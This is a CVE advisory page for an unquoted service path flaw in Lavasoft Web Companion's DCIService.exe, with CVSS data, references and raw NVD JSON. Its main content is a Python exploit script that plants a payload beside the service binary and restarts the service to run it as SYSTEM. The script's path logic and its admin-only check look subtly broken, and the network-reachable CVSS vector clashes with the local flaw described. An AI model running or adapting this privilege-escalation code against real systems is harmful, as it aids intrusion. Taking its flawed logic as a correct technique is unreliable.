CVE-2025-45095

Description

Lavasoft Web Companion (also known as Ad-Aware WebCompanion) versions 8.9.0.1091 through 12.1.3.1037 installs the DCIService.exe service with an unquoted service path vulnerability. An attacker with write access to the file system could potentially execute arbitrary code with elevated privileges by placing a malicious executable in the unquoted path.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Lavasoft Web Companion >= 8.9.0.1091

Lavasoft Web Companion <= 12.1.3.1037

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-45095 - Lavasoft Web Companion Unquoted Service Path Exploit
# Vulnerability: Unquoted Service Path in DCIService.exe
# Affected: Lavasoft Web Companion v8.9.0.1091 - v12.1.3.1037

import os
import sys
import subprocess
import ctypes

def check_service_path():
    """Check the service path of DCIService"""
    try:
        result = subprocess.run(
            ['sc', 'qc', 'DCIService'],
            capture_output=True, text=True, check=True
        )
        output = result.stdout
        for line in output.split('\n'):
            if 'BINARY_PATH_NAME' in line:
                path = line.split(':', 1)[1].strip()
                return path
    except subprocess.CalledProcessError:
        print("[-] DCIService not found or access denied")
    return None

def exploit_unquoted_path(malicious_path):
    """
    Place a malicious executable in a directory that appears
    earlier in the unquoted path resolution order.
    Example: If path is "C:\Program Files\Lavasoft\Web Companion\DCIService.exe"
    Place malicious exe at "C:\Program.exe" or "C:\Program Files\Lavasoft.exe"
    """
    service_path = check_service_path()
    if not service_path:
        print("[-] Could not retrieve service path")
        return False

    print(f"[*] Service binary path: {service_path}")

    # Check if path is quoted
    if service_path.startswith('"') and service_path.endswith('"'):
        print("[+] Service path is properly quoted. Not vulnerable.")
        return False

    print("[!] Service path is NOT quoted - VULNERABLE!")

    # Split path by spaces to find exploitable directories
    parts = service_path.split('\\')
    exploit_path = '\\'.join(parts[:2])  # e.g., C:\Program Files

    # Determine the malicious filename based on path splitting
    if len(parts) > 2:
        # The third component will be tried as executable
        target_dir = '\\'.join(parts[:-1])
        target_name = parts[-2] + '.exe'  # Previous dir name + .exe

        target_full_path = os.path.join(target_dir, target_name)
        print(f"[*] Target exploit path: {target_full_path}")

        # Copy malicious payload to the target location
        try:
            import shutil
            shutil.copy2(malicious_path, target_full_path)
            print(f"[+] Malicious payload placed at: {target_full_path}")
            print("[*] Wait for service restart or trigger service restart")

            # Attempt to restart the service
            subprocess.run(['sc', 'stop', 'DCIService'], capture_output=True)
            subprocess.run(['sc', 'start', 'DCIService'], capture_output=True)
            print("[+] Service restart triggered - payload should execute as SYSTEM")
            return True
        except PermissionError:
            print("[-] Permission denied. Need write access to target directory.")
            return False

    return False

if __name__ == "__main__":
    if not ctypes.windll.shell32.IsUserAnAdmin():
        print("[-] This exploit requires write access to system directories")
        print("[*] Note: Attacker needs prior filesystem write access")
        sys.exit(1)

    payload = sys.argv[1] if len(sys.argv) > 1 else "payload.exe"
    exploit_unquoted_path(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-45095
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-45095
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-45095/
[4] VulDB https://vuldb.com/cve/CVE-2025-45095
[5] https://gist.github.com/T4rantell/cd73592950c4ac700b40cc8e8e36494d

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-45095", "sourceIdentifier": "[email protected]", "published": "2025-10-09T15:16:06.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lavasoft Web Companion (also known as Ad-Aware WebCompanion) versions 8.9.0.1091 through 12.1.3.1037 installs the DCIService.exe service with an unquoted service path vulnerability. An attacker with write access to the file system could potentially execute arbitrary code with elevated privileges by placing a malicious executable in the unquoted path."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://gist.github.com/T4rantell/cd73592950c4ac700b40cc8e8e36494d", "source": "[email protected]"}]}}